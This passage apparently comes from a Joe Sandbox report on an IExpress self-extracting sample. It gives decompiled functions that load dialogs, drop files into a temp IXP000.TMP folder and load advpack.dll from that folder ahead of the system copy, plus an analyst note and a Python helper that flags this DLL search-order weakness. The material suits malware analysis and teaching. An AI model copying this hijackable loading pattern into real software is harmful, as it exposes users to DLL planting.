                                                                                                                                                                                                                                    0x0040398f
                                                                                                                                                                                                                                    0x0040399f
                                                                                                                                                                                                                                    0x004039a1
                                                                                                                                                                                                                                    0x00403991
                                                                                                                                                                                                                                    0x00403991
                                                                                                                                                                                                                                    0x00403991
                                                                                                                                                                                                                                    0x0040398f
                                                                                                                                                                                                                                    0x004039af
                                                                                                                                                                                                                                    0x004039b6
                                                                                                                                                                                                                                    0x00403a0f
                                                                                                                                                                                                                                    0x00403a0f
                                                                                                                                                                                                                                    0x00403a11
                                                                                                                                                                                                                                    0x00403a13
                                                                                                                                                                                                                                    0x00403a19
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004039b8
                                                                                                                                                                                                                                    0x004039b8
                                                                                                                                                                                                                                    0x004039ba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004039bc
                                                                                                                                                                                                                                    0x004039bf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004039c3
                                                                                                                                                                                                                                    0x004039c9
                                                                                                                                                                                                                                    0x004039ce
                                                                                                                                                                                                                                    0x004039d0
                                                                                                                                                                                                                                    0x004039e3
                                                                                                                                                                                                                                    0x004039e5
                                                                                                                                                                                                                                    0x004039e6
                                                                                                                                                                                                                                    0x004039f1
                                                                                                                                                                                                                                    0x004039f7
                                                                                                                                                                                                                                    0x004039fa
                                                                                                                                                                                                                                    0x00403a01
                                                                                                                                                                                                                                    0x00403a04
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403a06
                                                                                                                                                                                                                                    0x00403a09
                                                                                                                                                                                                                                    0x00403a09
                                                                                                                                                                                                                                    0x00403a0b
                                                                                                                                                                                                                                    0x00403a0b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403a09
                                                                                                                                                                                                                                    0x004039fc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004039fc
                                                                                                                                                                                                                                    0x004039d3
                                                                                                                                                                                                                                    0x004039d8
                                                                                                                                                                                                                                    0x004039da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004039dc
                                                                                                                                                                                                                                    0x004039b6
                                                                                                                                                                                                                                    0x00403955
                                                                                                                                                                                                                                    0x0040395b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403961
                                                                                                                                                                                                                                    0x00403963
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403969
                                                                                                                                                                                                                                    0x00403969
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403969
                                                                                                                                                                                                                                    0x00403915
                                                                                                                                                                                                                                    0x00403915
                                                                                                                                                                                                                                    0x0040391b
                                                                                                                                                                                                                                    0x0040391f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040392d
                                                                                                                                                                                                                                    0x00403933
                                                                                                                                                                                                                                    0x00403938
                                                                                                                                                                                                                                    0x0040393a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00403940
                                                                                                                                                                                                                                    0x00403946
                                                                                                                                                                                                                                    0x0040394b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040394b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004038f2
                                                                                                                                                                                                                                    0x00403843
                                                                                                                                                                                                                                    0x00403845
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040384b
                                                                                                                                                                                                                                    0x0040384d
                                                                                                                                                                                                                                    0x00403883
                                                                                                                                                                                                                                    0x00403885
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040389a
                                                                                                                                                                                                                                    0x0040389e
                                                                                                                                                                                                                                    0x0040389e
                                                                                                                                                                                                                                    0x00000000
[Instruction address column for the decompiled function above: addresses 0x0040372d to 0x00403a3e in this span; entries of 0x00000000 belong to lines with no instruction address]

APIs
• GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00403723
• MessageBeep.USER32(00000000), ref: 004039C3
• MessageBoxA.USER32(00000000,00000000,doza2,00000030), ref: 004039F1
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Message$BeepVersion
• String ID: 3$doza2
• API String ID: 2519184315-2054879145
• Opcode ID: 5410a1e59fb1f08b1bc7790a1bc39d6c67850e2047caedfc921ec61187b5cfd1
• Instruction ID: b81105887f12e35a37dab4eacb44c34be458b82212792c55bce88564180a53cc
• Opcode Fuzzy Hash: 5410a1e59fb1f08b1bc7790a1bc39d6c67850e2047caedfc921ec61187b5cfd1
• Instruction Fuzzy Hash: EB91E4B1B012149BEB34DF15CD407AA7BA8AB85306F1540BBD989BB2D1D7788F81CF49
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 78%
E00406517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
	struct HRSRC__* _t6;
	char* _t5; // declaration added: the decompiler output used _t5 without declaring it
	void* _t21;
	struct HINSTANCE__* _t23;
	int _t24;

	_t23 =  *0x409a3c; // 0x400000: module base (HINSTANCE) read from a global
	_t6 = FindResourceA(_t23, __edx, 5); // resource type 5 = RT_DIALOG; __edx names the dialog template
	if(_t6 == 0) {
		L6:
		// Failure path (template not found, not loadable, or dialog returned -1):
		// call helper E004044B9 with message id 0x4fb and flags 0x10 (assumed to be
		// forwarded as MB_ICONHAND), then return the caller-supplied default _a16
		E004044B9(0, 0x4fb, 0, 0, 0x10, 0);
		_t5 =  &_a16; // 0x402ee8
		_t24 =  *_t5;
	} else {
		_t21 = LoadResource(_t23, _t6);
		if(_t21 == 0) {
			goto L6;
		} else {
			// fifth argument (dwInitParam) of DialogBoxIndirectParamA: _a12 if given, else 0
			if(_a12 != 0) {
				_push(_a12);
			} else {
				_push(0);
			}
			_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
			FreeResource(_t21);
			if(_t24 == 0xffffffff) { // -1 means DialogBoxIndirectParamA failed
				goto L6;
			}
		}
	}
	return _t24;
}

Instruction addresses: 0x0040651f, 0x0040652a, 0x00406534, 0x0040656b, 0x00406577, 0x0040657c, 0x0040657c, 0x00406536, 0x0040653e, 0x00406542, 0x00000000, 0x00406544, 0x00406547, 0x0040654c, 0x00406549, 0x00406549, 0x00406549, 0x0040655e, 0x00406560, 0x00406569, 0x00000000, 0x00000000, 0x00406569, 0x00406542, 0x00406587

APIs
• FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 0040652A
• LoadResource.KERNEL32(00400000,00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00406538
• DialogBoxIndirectParamA.USER32(00400000,00000000,00000547,004019E0,00000000), ref: 00406557
• FreeResource.KERNEL32(00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00406560
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: Resource$DialogFindFreeIndirectLoadParam
• String ID: .@
• API String ID: 1214682469-2582305824
• Opcode ID: 70f531a75461c744cc8eb9bb8e8cf065a569eee3c28a8c9a419dda183718cb88
• Instruction ID: b6aca25b56715203ff799519597f98c75816ff70f42a55b2cf7247ba824ed053
• Opcode Fuzzy Hash: 70f531a75461c744cc8eb9bb8e8cf065a569eee3c28a8c9a419dda183718cb88
• Instruction Fuzzy Hash: DC012672100219BBCB105F69AC08DBB7A6CEB89364F01013AFE01B3290D7758C308AA9
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 83%
E00406495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
	signed int _v8;
	char _v268;
	void* __edi;
	signed int _t9;
	signed char _t14;
	struct HINSTANCE__* _t15;
	void* _t18;
	CHAR* _t26;
	void* _t27;
	signed int _t28;

	_t27 = __esi;
	_t18 = __ebx;
	_t9 =  *0x408004; // 0x8f135e3b
	_v8 = _t9 ^ _t28;
	_push(__ecx);
	E00401781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
	_t26 = "advpack.dll";
	E0040658A( &_v268, 0x104, _t26);
	_t14 = GetFileAttributesA( &_v268);
	if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
		_t15 = LoadLibraryA(_t26);
	} else {
		_t15 = LoadLibraryExA( &_v268, 0, 8);
	}
	return E00406CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
}

Instruction addresses: 0x00406495, 0x00406495, 0x004064a0, 0x004064a7, 0x004064ab, 0x004064bd, 0x004064c2, 0x004064d3, 0x004064df, 0x004064e8, 0x00406502, 0x004064ee, 0x004064f9, 0x004064f9, 0x00406516

APIs
• GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 004064DF
• LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 004064F9
• LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00406502
Strings
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: LibraryLoad$AttributesFile
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
• API String ID: 438848745-258089097
• Opcode ID: 4eef0de7905a697cee202246d5c41a4fe9ae2168913c907484af99a2600e252b
• Instruction ID: f343e68db0231e3b1b86542e237e673f83042691aa5beef6a9f0cd15a7b4c131
• Opcode Fuzzy Hash: 4eef0de7905a697cee202246d5c41a4fe9ae2168913c907484af99a2600e252b
• Instruction Fuzzy Hash: 0F012630A00108ABE710DB60EC49EEE7338DB54314F5001BAF586B21D0CF789E968A09
Uniqueness
Uniqueness Score: -1.00%
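
Analyst note on the two decompiled functions above. E00406495 builds `<extraction dir>\IXP000.TMP\advpack.dll`, calls GetFileAttributesA on it, and loads that file with LoadLibraryExA(..., 0, 8) whenever it exists and is not a directory (0x10 is FILE_ATTRIBUTE_DIRECTORY, 0xffffffff is INVALID_FILE_ATTRIBUTES); only if the local copy is absent does it fall back to LoadLibraryA("advpack.dll") and the normal search order. Flag 8 is LOAD_WITH_ALTERED_SEARCH_PATH, so dependencies of that DLL are also resolved relative to the temp directory first. The IXP000.TMP directory, the advpack.dll probe and the FINISHMSG / "<None>" strings in E00404169 are consistent with the IExpress self-extraction stub; the security-relevant point is that a DLL sitting in a user-writable temp directory wins over the system copy. The preceding function does the same kind of resource handling for a dialog: FindResourceA type 5 is RT_DIALOG, and the block frees it after DialogBoxIndirectParamA returns.

The following Python helper is an added example, not part of the Joe Sandbox report or of the sample: it models the branch in E00406495 with the file-attribute value injected (so it runs offline), and parses the report's own "APIs" lines, which are copied into `REPORT_API_LINES`, to flag the altered-search-path load from the temp directory, the by-name fallback load and the RT_DIALOG lookup. The regex, the `triage` heuristics and the finding names are this example's own assumptions about the report's line format, not an official parser.

```python
import re
from typing import Dict, List, Optional

# Documented Win32 constants (not values taken from the report).
INVALID_FILE_ATTRIBUTES = 0xFFFFFFFF
FILE_ATTRIBUTE_DIRECTORY = 0x10
LOAD_WITH_ALTERED_SEARCH_PATH = 0x8
RT_DIALOG = 5
TEMP_MARKER = "\\AppData\\Local\\Temp\\"

# API lines copied from the two "APIs" blocks above (constructed test input);
# "?" marks stack slots the sandbox could not resolve.
REPORT_API_LINES = [
    "• FindResourceA.KERNEL32(00400000,000007D6,00000005), ref: 0040652A",
    "• LoadResource.KERNEL32(00400000,00000000,?,?,00402EE8,00000000,004019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00406538",
    "• GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\,?,00000000), ref: 004064DF",
    "• LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\,?,00000000), ref: 004064F9",
    "• LoadLibraryA.KERNEL32(advpack.dll,?,C:\\Users\\user\\AppData\\Local\\Temp\\IXP000.TMP\\,?,00000000), ref: 00406502",
]


def choose_library_load(file_attributes: int, local_path: str, dll_name: str):
    """Model of the branch in E00406495: GetFileAttributesA's result is passed
    in so the decision can be exercised without Windows. A DLL in the stub's
    own extraction directory is preferred; the system search order is only
    used when that file is missing or is a directory."""
    if file_attributes == INVALID_FILE_ATTRIBUTES or file_attributes & FILE_ATTRIBUTE_DIRECTORY:
        return ("LoadLibraryA", dll_name, 0)
    return ("LoadLibraryExA", local_path, LOAD_WITH_ALTERED_SEARCH_PATH)


# Assumed shape of one report line: "• Api.MODULE(arg,arg,...), ref: ADDR".
_API_LINE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_api_line(line: str) -> Optional[Dict]:
    """Split one APIs line into api name, module, argument tokens and call site.
    The sandbox lists the real parameters first and further stack slots after
    them, so only the leading tokens are true arguments."""
    m = _API_LINE.match(line)
    if m is None:
        return None
    return {
        "api": m.group("api"),
        "module": m.group("module"),
        "args": [a.strip() for a in m.group("args").split(",")],
        "ref": int(m.group("ref"), 16),
    }


def _hex(token: str) -> Optional[int]:
    """Parse a hex token; names, paths and '?' yield None."""
    try:
        return int(token, 16)
    except ValueError:
        return None


def triage(lines: List[str]) -> List[Dict]:
    """Return findings worth a second look in a set of APIs lines."""
    findings = []
    for line in lines:
        call = parse_api_line(line)
        if call is None:
            continue
        api, args, ref = call["api"], call["args"], call["ref"]
        temp_paths = [a for a in args if TEMP_MARKER in a]
        if api.startswith("LoadLibraryEx"):
            # dwFlags is the third parameter of LoadLibraryEx.
            flags = _hex(args[2]) if len(args) > 2 else None
            if flags is not None and flags & LOAD_WITH_ALTERED_SEARCH_PATH and temp_paths:
                findings.append({"ref": ref, "kind": "altered_search_path_load", "detail": temp_paths[0]})
        elif api.startswith("LoadLibrary"):
            # Bare module name: resolved through the standard DLL search order.
            findings.append({"ref": ref, "kind": "search_order_load", "detail": args[0]})
        elif api.startswith("FindResource"):
            # Third parameter is the resource type; 5 is RT_DIALOG.
            if len(args) > 2 and _hex(args[2]) == RT_DIALOG:
                findings.append({"ref": ref, "kind": "dialog_resource", "detail": f"id 0x{_hex(args[1]):X}"})
    return findings


if __name__ == "__main__":
    for f in triage(REPORT_API_LINES):
        print(f"{f['ref']:08X} {f['kind']}: {f['detail']}")
```

Run against the lines above, the helper reports the LOAD_WITH_ALTERED_SEARCH_PATH load at 004064F9 with the IXP000.TMP path on the stack, the by-name fallback at 00406502 and the RT_DIALOG lookup of resource 0x7D6 at 0040652A; the same regex can be pointed at any other APIs block in the report.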

C-Code - Quality: 32%
E00404169(void* __eflags) {
	int _t18;
	void* _t21;

	_t20 = E0040468F("FINISHMSG", 0, 0);
	_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
	if(_t21 != 0) {
		if(E0040468F("FINISHMSG", _t21, _t20) != 0) {
			if(lstrcmpA(_t21, "<None>") == 0) {
				L7:
				return LocalFree(_t21);
			}
			_push(0);
			_push(0x40);
			_push(0);
			_push(_t21);
			_t18 = 0x3e9;
			L6:
			E004044B9(0, _t18);
			goto L7;
		}
		_push(0);
                                                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					_t18 = 0x4b1;
                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E004044B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x0040417d
                                                                                                                                                                                                                                    0x0040418f
                                                                                                                                                                                                                                    0x00404193
                                                                                                                                                                                                                                    0x004041b7
                                                                                                                                                                                                                                    0x004041d3
                                                                                                                                                                                                                                    0x004041e6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004041e7
                                                                                                                                                                                                                                    0x004041d5
                                                                                                                                                                                                                                    0x004041d6
                                                                                                                                                                                                                                    0x004041d8
                                                                                                                                                                                                                                    0x004041d9
                                                                                                                                                                                                                                    0x004041da
                                                                                                                                                                                                                                    0x004041df
                                                                                                                                                                                                                                    0x004041e1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004041e1
                                                                                                                                                                                                                                    0x004041b9
                                                                                                                                                                                                                                    0x004041ba
                                                                                                                                                                                                                                    0x004041bc
                                                                                                                                                                                                                                    0x004041bd
                                                                                                                                                                                                                                    0x004041be
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x004041be
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046A0
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: SizeofResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046A9
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004046C3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LoadResource.KERNEL32(00000000,00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046CC
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: LockResource.KERNEL32(00000000,?,00402D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004046D3
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: memcpy_s.MSVCRT ref: 004046E5
                                                                                                                                                                                                                                      • Part of subcall function 0040468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004046EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,004030B4), ref: 00404189
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,004030B4), ref: 004041E7
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00404518
                                                                                                                                                                                                                                      • Part of subcall function 004044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00404554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                    • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                    • Opcode ID: c03d363b405e083a574d33f40101cf6cd3cc99f86cc3b4d98ea56d3fc13fb6b2
                                                                                                                                                                                                                                    • Instruction ID: b70afbfb341dd1e48003f8e01e3fe3506c20631bb83d4641c2337169838dded0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c03d363b405e083a574d33f40101cf6cd3cc99f86cc3b4d98ea56d3fc13fb6b2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F7018BF53002147BF3252A664C9AF6B218EDBD4799F10413BBB06B52D09ABCCC1141AD
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E004019E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t11;
                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                    				struct HWND__* _t34;
                                                                                                                                                                                                                                    				signed int _t35;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t33 = __edi;
                                                                                                                                                                                                                                    				_t27 = __ebx;
                                                                                                                                                                                                                                    				_t11 =  *0x408004; // 0x8f135e3b
                                                                                                                                                                                                                                    				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                                                    				_t34 = _a4;
                                                                                                                                                                                                                                    				_t14 = _a8 - 0x110;
                                                                                                                                                                                                                                    				if(_t14 == 0) {
                                                                                                                                                                                                                                    					_t32 = GetDesktopWindow();
                                                                                                                                                                                                                                    					E004043D0(_t34, _t15);
                                                                                                                                                                                                                                    					_v520 = 0;
                                                                                                                                                                                                                                    					LoadStringA( *0x409a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                                                    					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                                                    					MessageBeep(0xffffffff);
                                                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					if(_t14 != 1) {
                                                                                                                                                                                                                                    						L4:
                                                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t32 = _a12;
                                                                                                                                                                                                                                    						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                                                    							goto L4;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							EndDialog(_t34, _t32);
                                                                                                                                                                                                                                    							L6:
                                                                                                                                                                                                                                    							_t23 = 1;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00406CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x004019e0
Address column for the decompiled lines above (one entry per line, as listed in the report): 0x004019e0, 0x004019eb, 0x004019f2, 0x004019f9, 0x004019fc, 0x00401a01, 0x00401a2a, 0x00401a2e, 0x00401a3e, 0x00401a4f, 0x00401a62, 0x00401a6a, 0x00000000, 0x00401a03, 0x00401a06, 0x00401a20, 0x00401a20, 0x00401a08, 0x00401a08, 0x00401a14, 0x00000000, 0x00401a16, 0x00401a18, 0x00401a70, 0x00401a72, 0x00401a72, 0x00401a14, 0x00401a06, 0x00401a81

APIs
• EndDialog.USER32(?,?), ref: 00401A18
• GetDesktopWindow.USER32 ref: 00401A24
• LoadStringA.USER32(?,?,00000200), ref: 00401A4F
• SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00401A62
• MessageBeep.USER32(000000FF), ref: 00401A6A
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
• String ID:
• API String ID: 1273765764-0
• Opcode ID: d9743750891ecfc6e9dee04f25138df3a5583d44e806c7f1623634d903d62883
• Instruction ID: 9f07e2b583c3b9e3b689e24bd258bcd44b67705ed80a1d215512c7b4a79a90b1
• Opcode Fuzzy Hash: d9743750891ecfc6e9dee04f25138df3a5583d44e806c7f1623634d903d62883
• Instruction Fuzzy Hash: 381152316012199BDB10EF68DE08AAE77B8EB49310F108175F916B61E1DA349E11DF99
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 88%
			E004063C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
				// File-drop routine: writes _a4 bytes from the buffer _a16 to a file named _a12
				// inside <TEMP>\IXP000.TMP\, the extraction folder name used by IExpress (wextract)
				// self-extracting packages. Returns 1 on success, 0 on any failure.
				signed int _v8;
				char _v268;   // path buffer, MAX_PATH (0x104) bytes
				long _v272;   // bytes written by WriteFile
				void* _v276;  // copy of the source buffer pointer
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t15;
				long _t28;
				struct _OVERLAPPED* _t37;
				void* _t39;
				signed int _t40;
				
				_t15 =  *0x408004; // 0x8f135e3b  (global cookie; together with the epilogue below this matches the /GS stack-cookie pattern)
				_v8 = _t15 ^ _t40;
				_v272 = _v272 & 0x00000000; // bytes written = 0
				_push(__ecx);
				_v276 = _a16;
				_t37 = 1; // success flag, cleared on failure
				// Build the destination path: directory first, then the file name. Both helpers take
				// the buffer and its size (0x104 = MAX_PATH), so they are most likely bounded copy/append.
				E00401781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
				E0040658A( &_v268, 0x104, _a12);
				_t28 = 0;
				// CreateFileA(path, GENERIC_WRITE (0x40000000), no sharing, no security attributes,
				//             CREATE_ALWAYS (2), FILE_ATTRIBUTE_NORMAL (0x80), no template)
				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t39 != 0xffffffff) { // INVALID_HANDLE_VALUE
					_t28 = _a4;
					// A failed or short write is treated as failure
					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
						 *0x409124 = 0x80070052; // HRESULT_FROM_WIN32(ERROR_CANNOT_MAKE), stored in a global last-error slot
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x409124 = 0x80070052; // same error when the file could not be created
					_t37 = 0;
				}
				// Stack-cookie check on return (_v8 ^ _t40); _t37 carries the success flag
				return E00406CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

Address column for the decompiled lines of E004063C0 above (one entry per line, as listed in the report): 0x004063cb, 0x004063d2, 0x004063d8, 0x004063ea, 0x004063f3, 0x00406401, 0x00406402, 0x00406410, 0x00406415, 0x00406433, 0x00406438, 0x00406449, 0x00406463, 0x0040646d, 0x00406477, 0x00406477, 0x0040647a, 0x0040643a, 0x0040643a, 0x00406444, 0x00406444, 0x00406492

APIs
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040642D
• WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040645B
• CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 0040647A
Strings
• C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004063EB
Memory Dump Source
• Source File: 00000000.00000002.446310125.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.446310125.000000000040C000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_szDGo5lHdI.jbxd
Similarity
• API ID: File$CloseCreateHandleWrite
• String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
• API String ID: 1065093856-2312194364
• Opcode ID: 1d08131b8de5a93f00fc779c4fb946ff78967df0c99f5913713becff4f1b13ca
• Instruction ID: 9e5926c835beb8d1d737b027b25a5559d0e4d4e7e399f98f9f62a26a88332679
• Opcode Fuzzy Hash: 1d08131b8de5a93f00fc779c4fb946ff78967df0c99f5913713becff4f1b13ca
• Instruction Fuzzy Hash: FF21C071A0021CAFDB10DF25DC85FEB7368EB44314F1041BAB985B7290DAB45D958FAC
Uniqueness
• Uniqueness Score: -1.00%
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E004047E0(intOrPtr* __ecx) {
                                                                                                                                                                                                                                    				intOrPtr _t6;
                                                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                                                    				void* _t11;
